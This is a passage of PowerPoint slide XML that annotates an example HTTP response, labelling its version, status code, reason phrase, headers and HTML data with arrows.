                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>text/html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" spc="215" dirty="0">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="60325">
              <a:lnSpc>
                <a:spcPct val="114599"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="210" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Last-Modified:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="85" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="210" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Thu,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="285" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="245" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Aug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>17:39:05</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>GMT  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="60325">
              <a:lnSpc>
                <a:spcPct val="114599"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" spc="215" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Set-Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="215" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="80" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="370" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="209"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="220" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Content-Length:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="80" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2543</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPts val="1410"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="215" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="80" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="229" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="80" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="245" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="80" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="260" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="80" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="235" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="85" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="235" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>formatted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="80" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="265" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>using  html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="80" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="185" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;/HTML&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1667510">
              <a:lnSpc>
                <a:spcPct val="114599"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8005A9B6-B383-AA4D-8D0E-FFBB47E5AC06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900112" y="1707200"/>
            <a:ext cx="1498600" cy="299720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>version</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1194B35E-1D5F-D844-B491-0814C4E0C4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1589086" y="2071943"/>
            <a:ext cx="161925" cy="286385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="161925" h="286385">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="161353" y="286196"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15BD4ED1-257B-6A45-BF0F-45818FBAAEEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1713506" y="2333162"/>
            <a:ext cx="88916" cy="109809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E9F145F-7989-AD43-8127-EDCE5B7D382C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2858452" y="1707200"/>
            <a:ext cx="1318260" cy="299720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Status</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4BF4CB7-8A52-1848-BC5A-44AF58F0DF9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2811310" y="2024318"/>
            <a:ext cx="593725" cy="429895"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="593725" h="429894">
                <a:moveTo>
                  <a:pt x="593240" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="429825"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15978433-4AE5-274E-A244-7C0CD98285D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2731778" y="2419139"/>
            <a:ext cx="107518" cy="95252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{469396A1-7860-C545-AD9F-F5867B0DEE12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3344467" y="2019557"/>
            <a:ext cx="1574800" cy="439420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1574800" h="439419">
                <a:moveTo>
                  <a:pt x="1574241" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="439185"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E5BDCC1-72D9-0346-8247-5A0670BD5E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3251671" y="2418909"/>
            <a:ext cx="110776" cy="79666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{625B77FD-34C3-0E46-BA6F-FE2CC494D491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4799648" y="1611630"/>
            <a:ext cx="1663064" cy="768350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="501015" marR="5080" indent="-488950">
              <a:lnSpc>
                <a:spcPct val="135400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Reason</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>phrase  Headers</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7887E57B-B715-134C-A386-2A0CA8DAD18A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4789797" y="2346582"/>
            <a:ext cx="514350" cy="337820"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="514350" h="337820">
                <a:moveTo>
                  <a:pt x="514039" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="337338"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDE71C9A-DDD5-2046-A307-142482CEE281}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4707994" y="2648089"/>
            <a:ext cx="108590" cy="92788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6596D8D-372D-9E4D-A5D3-FA5BEEDCC4D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7617778" y="3618006"/>
            <a:ext cx="521334" cy="299720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17F79CCF-1477-0145-B024-8F8D958478B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6585972" y="3993863"/>
            <a:ext cx="1263650" cy="790575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1263650" h="790575">
                <a:moveTo>
                  <a:pt x="1263580" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="790290"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DA062C6-1047-F843-953B-93DFCE6A1B1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6503151" y="4747951"/>
            <a:ext cx="109030" cy="91569"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5399046D-BD1F-5244-9959-7C9A16144DC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527174" y="4839520"/>
            <a:ext cx="6611938" cy="691515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
